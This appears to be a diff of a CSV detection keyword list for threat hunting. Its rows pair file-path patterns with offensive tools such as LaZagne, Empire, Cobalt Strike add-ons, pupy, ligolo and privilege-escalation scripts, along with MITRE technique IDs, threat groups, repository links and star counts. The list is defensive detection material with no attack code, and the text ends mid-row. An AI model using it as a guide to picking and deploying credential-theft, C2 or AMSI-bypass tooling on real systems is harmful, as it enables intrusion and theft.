- Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/lateral_movement/*.ps1","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1092","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/laZagne.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*/LaZagne/Windows/*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/ldap.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*/ldap_injection.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","","N/A","","","" "*/ldap_search_bof.py*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" "*/ldap-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ldap-checker.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/ldap-novell-getpass.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/LdapRelayScan.git*","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","1","N/A","8","4","389","51","2023-09-04T05:43:00Z","2022-01-16T06:50:44Z" +"*/LdapRelayScan.git*","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","1","N/A","8","4","390","51","2023-09-04T05:43:00Z","2022-01-16T06:50:44Z" "*/ldap-rootdse.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ldap-search.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ldapsearch-ad.git*","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","1","N/A","N/A","2","123","26","2023-05-10T13:30:16Z","2019-12-08T00:25:57Z" -"*/LDAPWordlistHarvester.git*","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","5","3","218","14","2023-10-01T21:12:10Z","2023-09-22T10:10:10Z" +"*/LDAPWordlistHarvester.git*","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","5","3","221","14","2023-10-04T19:01:55Z","2023-09-22T10:10:10Z" "*/ldeep/*","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","N/A","3","219","26","2023-10-02T20:36:02Z","2018-10-22T18:21:44Z" -"*/ldeepDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/ldeepDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*/LetMeOutSharp/*","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/AggressiveProxy","1","1","N/A","10","10","139","26","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z" "*/lexmark-config.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/lgandx/Responder*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*/lib/GHunt/*","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","OSINT exploitation tools","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","9","800","93","2023-08-12T21:59:23Z","2020-04-07T22:25:38Z" -"*/lib/ipLookupHelper.py*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" -"*/lib/msf/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/libgobuster*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" -"*/liboffsetfinder64*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/lib/ipLookupHelper.py*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*/lib/msf/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/libgobuster*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*/liboffsetfinder64*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/LibSnaffle*","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","N/A","AD Enumeration","https://github.com/Group3r/Group3r","1","1","N/A","N/A","5","488","47","2023-08-07T16:45:14Z","2021-07-05T05:05:42Z" "*/LightsOut.git*","offensive_tool_keyword","LightsOut","Generate an obfuscated DLL that will disable AMSI & ETW","T1027.003 - T1059.001 - T1082","TA0005 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/icyguider/LightsOut","1","1","N/A","N/A","3","243","29","2023-06-09T10:39:36Z","2023-06-01T14:57:44Z" "*/ligolo.git*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*/ligolo-ng*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" -"*/LinEnum.git*","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation Checks","T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - TA0001","N/A","N/A","Privilege Escalation","https://github.com/rebootuser/LinEnum","1","1","N/A","N/A","10","6220","1947","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z" -"*/LinEnum/*","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation Checks","T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - TA0001","N/A","N/A","Privilege Escalation","https://github.com/rebootuser/LinEnum","1","1","N/A","N/A","10","6220","1947","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z" +"*/LinEnum.git*","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation Checks","T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - TA0001","N/A","N/A","Privilege Escalation","https://github.com/rebootuser/LinEnum","1","1","N/A","N/A","10","6219","1947","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z" +"*/LinEnum/*","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation Checks","T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - TA0001","N/A","N/A","Privilege Escalation","https://github.com/rebootuser/LinEnum","1","1","N/A","N/A","10","6219","1947","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z" "*/linpeas.sh*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*/linpeas.sh*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" +"*/linpeas.sh*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" "*/linux_ldso_dynamic.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*/linux_ldso_hwcap.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*/linux_ldso_hwcap_64.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*/linux_offset2lib.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" -"*/linux-smart-enumeration.git*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" -"*/linWinPwn*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/linux-smart-enumeration.git*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*/linWinPwn*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*/llmnr-resolve.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/lltd-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/load-assembly.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" +"*/load-assembly.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" "*/LoadDllRemote.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" -"*/loader/bypass.c","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"*/loader/bypass.h","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - 